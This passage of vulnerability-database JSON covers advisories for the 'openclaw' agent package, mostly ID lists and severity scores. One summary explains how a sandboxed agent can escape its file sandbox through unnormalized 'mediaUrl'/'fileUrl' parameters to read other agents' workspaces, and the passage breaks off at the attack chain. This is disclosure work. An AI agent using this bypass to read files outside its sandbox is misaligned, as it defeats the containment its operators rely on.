nerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vul
nerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vul
nerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35645","GHSA-h4jx-hjr3-fhgc"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cwd3-ecym-sfaw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90977?format=json","vulnerability_id":"VCID-cyj6-zyuh-qug6","summary":"OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n## Summary\nTlon cite expansion happened before channel and DM authorization completed, allowing cite work and content handling before the final auth decision.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n- `ebee4e2210e1f282a982c7ef2ad79d77a572fc87`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now defers cite expansion until after authorization and preserves explicit empty-allowlist semantics.\n- extensions/tlon/src/monitor/utils.ts and extensions/tlon/src/security.test.ts ship the deferred cite expansion behavior and regressions.\n\nOpenClaw thanks @zpbrent for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35637","reference_id":"","reference_type":"","scores":[{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.1803","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.17991","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00057","scoring_system":"epss","scoring_elements":"0.18028","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35637"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system
":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Trac
k","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35637"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"},{"reference_url":"https://github.com/advisories/GHSA-vfg3-pqpq-93m4","reference_id":"GHSA-vfg3-pqpq-93m4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vfg3-pqpq-93m4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"}
,{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"}
,{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"}
,{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"}
,{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"}
,{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35637","GHSA-vfg3-pqpq-93m4"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cyj6-zyuh-qug6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91841?format=json","vulnerability_id":"VCID-d3qp-5wm9-aqfp","summary":"OpenClaw has Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22)\n\n**Description**:\n### Summary\nA path traversal vulnerability in the agent sandbox enforcement allows a sandboxed agent to read arbitrary files from other agents' workspaces by using the `mediaUrl` or `fileUrl` parameter key in message tool calls. The `normalizeSandboxMediaParams` function only checks `[\"media\", \"path\", \"filePath\"]` keys, while `mediaUrl` and `fileUrl` escape normalization entirely. 
Combined with `handlePluginAction` dropping `mediaLocalRoots` from the dispatch context, this enables a full sandbox escape where any agent can read files outside its designated sandbox root.\n\n### Details\nThe vulnerability exists in two files within the messaging pipeline:\n\n**1. Incomplete parameter key coverage in `normalizeSandboxMediaParams`:**\n\nIn `src/infra/outbound/message-action-params.ts`, the function iterates over a hardcoded allowlist of parameter keys to validate:\n\n```typescript\n// Line 212\nconst mediaKeys: Array<\"media\" | \"path\" | \"filePath\"> = [\"media\", \"path\", \"filePath\"];\n```\n\nThe `mediaUrl` and `fileUrl` parameter keys are not included in this array. These keys are actively used by multiple channel extensions (Discord, Telegram, Slack, Matrix, Twitch) for media attachment handling, but they completely bypass the sandbox path validation performed by `resolveSandboxedMediaSource`.\n\n**2. Dropped `mediaLocalRoots` in `handlePluginAction`:**\n\nIn `src/infra/outbound/message-action-runner.ts`, the `handlePluginAction` function dispatches actions to channel plugins but omits `mediaLocalRoots` from the context:\n\n```typescript\n// Lines 684-697\nconst handled = await dispatchChannelMessageAction({\n    channel,\n    action,\n    cfg,\n    params,\n    accountId: accountId ?? undefined,\n    requesterSenderId: input.requesterSenderId ?? undefined,\n    sessionKey: input.sessionKey,\n    sessionId: input.sessionId,\n    agentId,\n    gateway,\n    toolContext: input.toolContext,\n    dryRun,\n    // mediaLocalRoots is MISSING here\n});\n```\n\nDespite `ChannelMessageActionContext` defining `mediaLocalRoots?: readonly string[]` (in `src/channels/plugins/types.core.ts` line 478), plugins receive `undefined` and fall back to `getDefaultMediaLocalRoots()`, which permits reads of the entire `~/.openclaw/` directory tree — including all agents' workspaces.\n\n**Attack chain:**\n1. 
